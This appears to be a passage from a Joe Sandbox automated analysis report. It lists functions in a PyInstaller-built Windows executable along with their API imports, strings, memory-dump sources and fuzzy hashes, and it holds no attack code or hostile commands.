Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
Instruction Fuzzy Hash: E1213B20F0CA5682FA68AB6D9A5113962535F447F0F9447B4DF7EC7AE6DE2DF8418300

Function 00007FF6BA3C7D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6BA3C7D9D
GetLastError.KERNEL32 ref: 00007FF6BA3C7DA9
CloseHandle.KERNEL32 ref: 00007FF6BA3C7DC1
CreateFileW.KERNEL32 ref: 00007FF6BA3C7DEC
WriteConsoleW.KERNEL32 ref: 00007FF6BA3C7E0B

Strings

CONOUT$, xrefs: 00007FF6BA3C7DCD

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction ID: f22df984048e9a670526796e3420dbc5eed755ff80c208596407c63db79874fd
Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction Fuzzy Hash: 8B118E21A18B5186E7508B2AFC55329A6A0FB88BE4F104274EF9DC77A4EF3CD854C740

Function 00007FF6BA3A8ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A8EFD
K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A8F5A

Part of subcall function 00007FF6BA3A9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6BA3A45F4,00000000,00007FF6BA3A1985), ref: 00007FF6BA3A93C9

K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A8FE5
K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A9044
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A9055
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A906A

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
Instruction ID: ca174d3faf54e9f5f0cfa029f881c9ac89c01321f0ff62ee77fcfafd13dbbd69
Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
Instruction Fuzzy Hash: 7141BC62B19A9281EE309B5AE4102BEB3A6FB85BC4F444175DF8DE7789DE3CE500C700

Function 00007FF6BA3BB2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB2D7
FlsSetValue.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB30D
FlsSetValue.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB33A
FlsSetValue.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB34B
FlsSetValue.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB35C
SetLastError.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB377

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
Instruction ID: 0c4e4368a6ac04a6a1af16ef9cc7cac7a12af766748610e59176326dbeec837e
Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
Instruction Fuzzy Hash: 6A112C20F0CE5282FA58AB6D965113D62439F84BB0F9447B4EF7EC76D6EE2CE8418700

Function 00007FF6BA3A2910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6BA3A1B6A), ref: 00007FF6BA3A295E

Strings

[PYI-%d:ERROR] , xrefs: 00007FF6BA3A2966
%s: %s, xrefs: 00007FF6BA3A29E8
Error, xrefs: 00007FF6BA3A2A0E
Error [ANSI Fallback], xrefs: 00007FF6BA3A29FF

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction ID: 6474216541e73cee04d5bea2235dbcdb92cf0d66e3b4a33291c267952bf03734
Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction Fuzzy Hash: 3C31D422B19B9552EB209B69E8406EA6396BF887D4F404136FF8DC3759EF7CD586C300

Function 00007FF6BA3A2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6BA3A23C8
DialogBoxIndirectParamW.USER32 ref: 00007FF6BA3A248E
DeleteObject.GDI32 ref: 00007FF6BA3A24C1
DestroyIcon.USER32 ref: 00007FF6BA3A24D3

Strings

Unhandled exception in script, xrefs: 00007FF6BA3A23F8

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
Instruction ID: abcc867859b592937e0a5fb97efe447c81b924d8ac483f2989db55483e6c5155
Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
Instruction Fuzzy Hash: 5C315B32A19A9289EB20DF69E8552F96361FF88788F840175EF4DC7B59EF3CD1448700

Function 00007FF6BA3A2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6BA3A918F,?,00007FF6BA3A3C55), ref: 00007FF6BA3A2BA0
MessageBoxW.USER32 ref: 00007FF6BA3A2C2A

Strings

[PYI-%d:%ls] , xrefs: 00007FF6BA3A2BA8
Warning, xrefs: 00007FF6BA3A2C1D
WARNING, xrefs: 00007FF6BA3A2BAF

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction ID: 6bb14bf5cdbc8b869888d2abea2137adcdb3eb0d78b61a92b002b37a9e8c5c41
Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction Fuzzy Hash: 2421AE62708B5182EB10DB69F8847EA73A5FB88780F404136EF8DD766AEE3CD245C740

Function 00007FF6BA3A2710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6BA3A1B99), ref: 00007FF6BA3A2760

Strings

ERROR, xrefs: 00007FF6BA3A276F
Error, xrefs: 00007FF6BA3A27DE
Error [ANSI Fallback], xrefs: 00007FF6BA3A27CF
[PYI-%d:%s] , xrefs: 00007FF6BA3A2768

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction ID: 650c7e43aba7845dd66f312a8e6f45dc3742a53488683232eb456c3364033eab
Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction Fuzzy Hash: 0F21A132A19B9182E720DB59F8807EA6394FB88380F400132FF8CC3659EF7CD1858740

Function 00007FF6BA3B9A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6BA3B9AAD
GetProcAddress.KERNEL32 ref: 00007FF6BA3B9AC3
FreeLibrary.KERNEL32 ref: 00007FF6BA3B9AEA

Strings

mscoree.dll, xrefs: 00007FF6BA3B9AA4
CorExitProcess, xrefs: 00007FF6BA3B9ABC

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction ID: bbe89f6377486ddb835e3b164c8dda79f18224af875dd38484ef08f2c7db0ed2
Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction Fuzzy Hash: 7CF06D61B09B1691EA108F28E89577A6321FF897A1F940375DF6EC62E4EF2CD489C300

Function 00007FF6BA3C9368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6BA3C9390
_set_statfp.LIBCMT ref: 00007FF6BA3C93AB
_set_statfp.LIBCMT ref: 00007FF6BA3C93C7
_set_statfp.LIBCMT ref: 00007FF6BA3C9403

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 7aceca4c67f259a8ea055f5cda5efb5388b7b723a3c09b52805fce967372f75b
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: AA118F26E5CB2311FA64116EECB237D1250AF593A0E0706B4FF6ED63DAAF6CA9414300

Function 00007FF6BA3BB390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF6BA3BA5A3,?,?,00000000,00007FF6BA3BA83E,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BB3AF
FlsSetValue.KERNEL32(?,?,?,00007FF6BA3BA5A3,?,?,00000000,00007FF6BA3BA83E,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BB3CE
FlsSetValue.KERNEL32(?,?,?,00007FF6BA3BA5A3,?,?,00000000,00007FF6BA3BA83E,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BB3F6
FlsSetValue.KERNEL32(?,?,?,00007FF6BA3BA5A3,?,?,00000000,00007FF6BA3BA83E,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BB407
FlsSetValue.KERNEL32(?,?,?,00007FF6BA3BA5A3,?,?,00000000,00007FF6BA3BA83E,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BB418

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
Instruction ID: 5107153a3523f70bccd5f3a3d828954c4bae41eeb6ba1abaea3632cffcdc22a4
Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
Instruction Fuzzy Hash: 30116320F0CE4281FA589B6D96512796143AF447B0FD853B4EF7DC66D6DE2CF8418300

Function 00007FF6BA3BB224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF6BA3BB235
FlsSetValue.KERNEL32 ref: 00007FF6BA3BB254
FlsSetValue.KERNEL32 ref: 00007FF6BA3BB27C
FlsSetValue.KERNEL32 ref: 00007FF6BA3BB28D
FlsSetValue.KERNEL32 ref: 00007FF6BA3BB29E

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
Instruction ID: 9aa9ffdd5bc88ab497d3b89d8a464cfdb7345b19c087d9fb5c3e39bcf37f5cbd
Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
Instruction Fuzzy Hash: 2F110920F0CE0786F968AA6D695117E11434F85770F9857B8DF3ECA6D2DD2DB8419311

Function 00007FF6BA3B5FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B5FDC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B6106
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B61BC

Strings

verbose, xrefs: 00007FF6BA3B5FB0

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: f311c9e24136a87dee3d19148c0fc7a5b38b122ddf6625ef5a4b908f65c372a8
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 15919A32A09E4681FB658E29D45037E76A6AB40B94F844276DF5EC73E7DF3CE8858301

Function 00007FF6BA3BFBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3BFEA7

Part of subcall function 00007FF6BA3B7A3C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B7A59

Strings

UTF-16LEUNICODE, xrefs: 00007FF6BA3BFE45
UTF-8, xrefs: 00007FF6BA3BFE26
ccs, xrefs: 00007FF6BA3BFDE2

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction ID: 1ba2870bf5cba99e8c96209f0761cb7b2f28a72f8d294bf50bcb638b8548fbcd
Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction Fuzzy Hash: 1181AF72E08A4385F7649F2D815027827A2AB11B48FD5A2B9CF09D72D9CF3EE949D301

Function 00007FF6BA3AD648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6BA3AD673
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6BA3AD70A
RtlUnwindEx.KERNEL32 ref: 00007FF6BA3AD764

Strings

csm, xrefs: 00007FF6BA3AD6F1

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction ID: e3afcafc8bb1c0cd91d7c4ac4f652bd2a6c99ed13ec28fbad4727f73886df184
Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction Fuzzy Hash: 01517A26A196628ADF188F19E444B7C63A6EB44BD8F108175EF4EC7788EF7DE841C700

Function 00007FF6BA3AF288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6BA3AF2B0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF6BA3AF398

Strings

csm, xrefs: 00007FF6BA3AF2D2
csm, xrefs: 00007FF6BA3AF3EA

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction ID: 2a3570806b04aeab73f2e69d670d3739fe0c39ef30192ff4d76e1e99d8ce88e9
Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction Fuzzy Hash: 0C518E32A086A28AEF748B29D04526C77A2EB54B84F1481B6EF8DC7BD5CF3DE454C701

